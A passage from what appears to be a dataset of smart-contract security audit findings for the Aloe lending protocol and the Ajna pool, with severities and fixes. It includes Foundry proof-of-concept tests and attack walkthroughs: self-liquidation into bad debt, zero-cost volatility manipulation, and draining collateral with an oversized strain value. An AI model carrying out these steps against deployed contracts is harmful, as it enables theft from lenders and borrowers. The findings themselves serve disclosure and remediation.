lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(\"mainnet\"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the \"extra\" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n emit log_named_uint(\"Before liquidation User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Before liquidation User stored borrow:\", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(\"Before liquidation User assets:\", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(\"\"));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(\"\"));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n -IV Can be Decreased for FreeчhighчThe liquidity at a single `tickSpacing` is used to calcualte the `IV`. The more liquidity is in this tick spacing, the lower the `IV`, as demonstarated by the `tickTvl` dividing the return value of the `estimate` function:\\n```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n\\nSince this is using data only from the block that the function is called, the liuquidyt can easily be increased by:\\ndepositing a large amount liquidity into the `tickSpacing`\\ncalling update\\nremoving the liquidity\\nNote that only a small portion of the total liquidity is in the entire pool is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contract this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE` which limits of the amount that IV can be manipulated per update does not sufficiently disincentivise manipulation, it just extends the time period required to manipulate.\\nDecreasing the IV increases the LTV, and due to the free cost, its reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. With the delay inherent in TWAP oracle and the liquidation delay by the warn-then-liquidate process, this manipulation can turn price change based insolvency from a 5 sigma event (as designed by the protocol) to a likely event.чUse the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.чDecreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.ч```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n -governor can permanently prevent withdrawals in spite of being restrictedчmediumчQuoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set a interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel` such as to not damage users of the protocol which is in line with how the `governor` role is described in the README.\\nHowever the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds for a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).чThe `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.чThe `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.ч```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n -Uniswap Formula Drastically Underestimates VolatiltyчmediumчNote: This report will use annualised IV expressed in % will be use, even though the code representation uses different scaling.\\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued with the same as \"selling a straddle\" which is a short-volatility strategy which involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanat loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a uniswap position is above the fair IV, then it is profitable to be a liquidity provider, if it is lower, than it is not.\\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\\nThe assumptions of the efficient market hypothesis holds true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this. If you are not already a liquidity provider, there is no way to provide \"negative liquidity\" or \"short a liquidity position\".\\nIn fact the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table which shows the derived IV at time of writing having far lower results than the historical volatilities and the the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\\nHere is a quote from that exact article, which points out that the Uniswap derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\\n```\\n\"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.\"\\n```\\n\\nThe `IV's` in options markets or protocols that have long-short mechanisms such as Opyn's Squeeth have a correction mechanism for `IV's` which are too low, because you can both buy and sell options, and are therefore \"correct\" according to Efficient Market Hypothesis. The Uniswap pool is a \"long-only\" market, where liquidity can be added, but not shorted, which leads to systematically lower `IV` than is realistic. The EMH model, both in soft and hard form, only holds when there is a mechnaism for a rational minority to profit off correcting a market imbalance. If many irrational or utilitarian users deposits too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, theres no way to profit off correcting this imbalance.\\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\\nOn chain data which shows that the liquidty and fee derivation from Uniswap gives far lower results than other\\nThe table provided in Lambert Guillaume's article, which shows a Uniswap pool derived IVs which are far lower than the historical volatilities of the asset.\\nStudies showing that liquidity providers suffer far more impermanent loss than fees.ч2 possible options (excuse the pun):\\nUse historical price differences in the Uniswap pool (similar to a TWAP, but Time Weighted Average Price Difference) and use that to infer volatilty alongside the current implementations which is based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The 2 `IV` calculations can be used to \"sanity check\" the other, to correct one which drastically underestimates the risk\\nSame as above, use the `maximum` of the fee/liquidity derived `IV` but use a market that has long/short possibilities such as Opyn's Squeeth to sanity check the `IV`.чThe lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol which is basically an impossibility, becomes possible/likely as the relationship between `IV` or `Pr(event)` is super-linearч```\\n\"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.\"\\n```\\n -Bad debt liquidation doesn't allow liquidator to receive its ETH bonus (ante)чmediumчMore detailed scenario\\nAlice account goes into bad debt for whatever reason. For example, the account has 150 DAI borrowed, but only 100 DAI assets.\\nBob tries to `liquidate` Alice account, but his transaction reverts, because remaining DAI liability after repaying 100 DAI assets Alice has, will be 50 DAI bad debt. `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI sending it 0.03 WETH. However, since Alice account has 0 WETH, the transfer will revert.\\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has 0.02 ETH net loss from liquidaiton (in addition to gas fees).\\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice account won't be liquidated and a borrow of 150 will be stuck in Alice account for a long time. Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User assets:\", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n emit log_named_uint(\"Liquidated User ante:\", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\nчConsider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator its full bonus.чLiquidators are not compensated for bad debt liquidations in some cases. Ante (liquidator bonus) is stuck in the borrower smart contract until bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead for these accounts to accumulate even bigger bad debt and lender depositors being unable to withdraw their funds from lender.ч```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(\"User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"User assets:\", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(\"\"), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(\"\"), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(\"Liquidated User borrow:\", lender0.borrowBalance(address(account)));\\n emit log_named_uint(\"Liquidated User assets:\", asset0.balanceOf(address(account)));\\n emit log_named_uint(\"Liquidated User ante:\", address(account).balance);\\n }\\n```\\n -Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 doesчmediumчLooking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to the intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are apart 24 hours (86400 seconds), this can lead to an overflow: Assume for simplicity `target - timeL = timeR - timeL`\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48`\\n```\\nчPerform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\nчThe corrupted return value affects the `Volatility` library. Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.ч```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n -The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debtчmediumчUsers face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` smaller than 1 results in the liquidator receiving a fraction of the user's collateral based on `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (with a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly (\"memory-safe\") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan. This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.чConsider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, \"Zero repayment impact.\") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).чUsers with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.ч```\\nassembly (\"memory-safe\") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n -Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty)чmediumч2.In _prepareTake() function,the BPF is calculated using vars.auctionPrice which is calculated by _auctionPrice() function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3.The _takeBucket() function made a judgment after _prepareTake()\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nso the root cause of this issue is that in a scenario where a user calls Deposit Take(params_.depositTake ==true) ,BPF will calculated base on vars_.auctionPrice instead of bucketPrice.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n params_.collateralScale,\\n vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\nчIn the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .чWrong auctionPrice used in calculating BFP which subsequently influences the _calculateTakeFlowsAndBondChange() and _rewardBucketTake() function will result in bias .\\nFollowing the example of the Whitepaper(section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129 The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772 )* 1100)} which is 18.3334 unit of ETH .Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18. 3334 · 1100 · 0. 008271889129 = 166. 8170374 𝐷𝐴𝐼. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementations: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4*0.011644 - 1/4 *0.010175 = 0.01201125. The collateral purchased is 18.368 unit of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974DAI Dave is awarded LPB in that bucket worth 18. 368 · 1100 · 0. 010175 = 205.58 𝐷𝐴𝐼.\\nSo,Dave earn more rewards(38.703 DAI) than he should have.\\nAs the Whitepaper says: \" the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. She also might be Dave, who is looking to ensure a return on his liquidation bond.\"ч```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n -Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` actionчmediumчThe Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs showed in the above snippet, in cases where `TP >= NP` and `NP = price` (thus val = 0) the function won't set a value for `sign` (will be `0` by default) so that will result in a computed `BPF` of `0`, instead of `bondFactor` that would be the correct `BPF`.чChange the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\nчThe kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.ч```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n -First pool borrower pays extra interestчmediumчFor any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n 